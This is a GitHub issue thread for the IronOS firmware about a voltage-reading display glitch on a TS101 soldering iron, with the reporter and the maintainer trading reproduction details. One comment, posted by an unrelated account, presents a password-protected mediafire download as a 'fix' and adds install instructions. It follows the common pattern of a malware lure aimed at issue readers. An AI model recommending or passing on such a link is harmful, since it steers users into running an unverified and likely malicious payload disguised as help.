Ralim/IronOS #1972: Graphical glitch on the voltage reading - TS101

mattia777, 2024-08-27:
Graphical glitch on the voltage reading where it displays "5.v2" when the soldering iron is tipped on the right side. The firmware I used is from this PR build: [https://github.com/Ralim/IronOS/actions/runs/10471975353?pr=1967](url)

[image]
[image]
[image]

MirsonMboa, 2024-08-27:
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

Ralim, 2024-09-25:
Hia,
Sorry for delay following up on this.
Could you specify which language you used, and also if you flashed a logo or not (just so i can try and replicate, as trying it here now didnt show the glitch)

mattia777, 2024-09-29:
Hi,
yeah, so I've used the TS101_EN from this PR build: https://github.com/Ralim/IronOS/actions/runs/10471975353?pr=1967, and yes I've flashed the logo into it.

[TS101.zip](https://github.com/user-attachments/files/17179526/TS101.zip)